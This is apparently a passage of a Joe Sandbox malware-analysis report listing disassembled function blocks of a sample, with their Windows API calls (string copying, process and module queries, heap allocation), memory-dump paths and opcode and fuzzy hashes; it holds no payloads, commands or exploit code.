                            • Instruction Fuzzy Hash: E10140B2904628ABCB149BC9DD45BBEB7BCFB4CB12F00011AF645E2290E7B85540D7B1
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 00B24492
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00B244AD
                            • CloseHandle.KERNEL32(00000000), ref: 00B244B4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B244E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: ce9995a8007b30c66927363b46d1656510987102bfaa60f32b273c5ed93ff669
                            • Instruction ID: 0cfe4f45a49f89e0a1a1c4634ef547399715d02748f8c3f33b29c4d39aaad3bb
                            • Opcode Fuzzy Hash: ce9995a8007b30c66927363b46d1656510987102bfaa60f32b273c5ed93ff669
                            • Instruction Fuzzy Hash: 15F0C8B09017256BE720AB74AC49BE6BBE8EF14304F0005E1FA59D7280DBF099858BA0
                            APIs
                            • __getptd.LIBCMT ref: 00B28FDD
                              • Part of subcall function 00B287FF: __amsg_exit.LIBCMT ref: 00B2880F
                            • __getptd.LIBCMT ref: 00B28FF4
                            • __amsg_exit.LIBCMT ref: 00B29002
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00B29026
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: d88f8a43751f50c66b4a79ab58fe159080f66da21941cffc560fe3d80b1886b8
                            • Instruction ID: 574c4862072bbcab633e4cdb9c95697de7abdfe59bee9469ae38f7d9b3449b65
                            • Opcode Fuzzy Hash: d88f8a43751f50c66b4a79ab58fe159080f66da21941cffc560fe3d80b1886b8
                            • Instruction Fuzzy Hash: 60F0F0329896348BDB20BB78B806B0E33E0AF00720F3545C8F00CAB2E2DF241800EA5D
                            APIs
                            • lstrlen.KERNEL32(------,00B05BEB), ref: 00B2731B
                            • lstrcpy.KERNEL32(00000000), ref: 00B2733F
                            • lstrcat.KERNEL32(?,------), ref: 00B27349
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 8ab40ee58e108a63e77f31006a51a14eff5274305e4236b227faae163600faa5
                            • Instruction ID: 971894b52a97ebb35c9fbac82fb112051e75fd4f24dd8e590f393fea410e4244
                            • Opcode Fuzzy Hash: 8ab40ee58e108a63e77f31006a51a14eff5274305e4236b227faae163600faa5
                            • Instruction Fuzzy Hash: A2F039745007128FCB249F35E898926BBF8EF85700328886DA89AC3314EB30D841DB24
                            APIs
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B13422
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1344B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B13471
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B13497
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: f8a191b5adc87f8c51a04180260cbb746577c02453caadb10fb79399e70933c2
                            • Instruction ID: 5234ab8d9240127183c566399186aac6294b82e0052a5bd350a4b3f876723484
                            • Opcode Fuzzy Hash: f8a191b5adc87f8c51a04180260cbb746577c02453caadb10fb79399e70933c2
                            • Instruction Fuzzy Hash: 3012CA70A012018FDB28CF19C554A65B7E5EF45B28B59C0EEE809DB3A6E772DD82CF50
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17C94
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B17CAF
                              • Part of subcall function 00B17D40: std::_Xinvalid_argument.LIBCPMT ref: 00B17D58
                              • Part of subcall function 00B17D40: std::_Xinvalid_argument.LIBCPMT ref: 00B17D76
                              • Part of subcall function 00B17D40: std::_Xinvalid_argument.LIBCPMT ref: 00B17D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: 82387c70face1bafd722b0b107060a847e55019b159cf12a260462e620a12701
                            • Instruction ID: 4387985fe07d3e78fed76fa31a87bbfd8831869b987aa3c99042b132a4e2d3a7
                            • Opcode Fuzzy Hash: 82387c70face1bafd722b0b107060a847e55019b159cf12a260462e620a12701
                            • Instruction Fuzzy Hash: E53128723482145BD720DE6CE8C09AAF7F9EF91760B7046BAF5428B641CB719DC083E4
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00B06F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B06F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: 105a198b9114e132dcb6b5a70ae6ac84a4e902b8f966e0ff564359bf4bea2c53
                            • Instruction ID: 0198ba3dd4d7dded8e5939d69b6012a0937b635ce5b4b4718f9c75b12a62020c
                            • Opcode Fuzzy Hash: 105a198b9114e132dcb6b5a70ae6ac84a4e902b8f966e0ff564359bf4bea2c53
                            • Instruction Fuzzy Hash: 2521AE706007028BEB208B20DC94BB677E8EB40700F4449B8F946CB6C4FBB4E945C760
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B2244C
                            • lstrlen.KERNEL32(00000000), ref: 00B224E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B22570
                            • lstrlen.KERNEL32(00000000), ref: 00B22577
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 3dbfed9311872b3e8de6f54e81012f8e84f1c2dddd70063677221a4860ebf423
                            • Instruction ID: 187b6908f5391d72465bca8bd2dd3328fba6d25aebbec748ff066fd96f7a5c72
                            • Opcode Fuzzy Hash: 3dbfed9311872b3e8de6f54e81012f8e84f1c2dddd70063677221a4860ebf423
                            • Instruction Fuzzy Hash: E281B071E00315ABDB14DB98EC44BAEBBF5EF94300F1481A9E508E7381EB759D46CB94
                            APIs
                              • Part of subcall function 00B01610: lstrcpy.KERNEL32(00000000), ref: 00B0162D
                              • Part of subcall function 00B01610: lstrcpy.KERNEL32(00000000,?), ref: 00B0164F
                              • Part of subcall function 00B01610: lstrcpy.KERNEL32(00000000,?), ref: 00B01671
                              • Part of subcall function 00B01610: lstrcpy.KERNEL32(00000000,?), ref: 00B01693
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 631aac0824bb3cb8e33e059154ce6ed98ec65cbc2fe001d7b29d03adf3587a48
                            • Instruction ID: 8eaa944948423abf651466f628a457c24c150a739e1a0c89a564ee2d8485cf7f
                            • Opcode Fuzzy Hash: 631aac0824bb3cb8e33e059154ce6ed98ec65cbc2fe001d7b29d03adf3587a48
                            • Instruction Fuzzy Hash: D231C274A01F029FC728DF3AC998956BBE5FF88300704496EA896C7B50DB70F811CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00B215A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B215D9
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B21611
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B21649
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 0716bfdf77d3c121b1b2d8b81bab7ddf8a14e81c4ac9364bb9e74fe795c2ac8e
                            • Instruction ID: 755b1068f826c12ea49a321b2ea369ef6a9c3a98636c6e2cf7cc22f0fbe36ffb
                            • Opcode Fuzzy Hash: 0716bfdf77d3c121b1b2d8b81bab7ddf8a14e81c4ac9364bb9e74fe795c2ac8e
                            • Instruction Fuzzy Hash: 6721D974601B029BD725DF2EE458A17B7F5FFA4700B0449ADA49AC7B80DB34E845CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00B0162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01671
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01693
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 713aedbb7c00f16b384ccd8c0727964914cea63ee44683a02c1ac8c3385b3f31
                            • Instruction ID: 3d77c8001372a0c32778e1fa21a893286fe824558834ff66e960331d7cb8f120
                            • Opcode Fuzzy Hash: 713aedbb7c00f16b384ccd8c0727964914cea63ee44683a02c1ac8c3385b3f31
                            • Instruction Fuzzy Hash: 88110074A11B039BDB289F79D85C927BBF8FF44701708496DA496C3B80EB31E801CBA0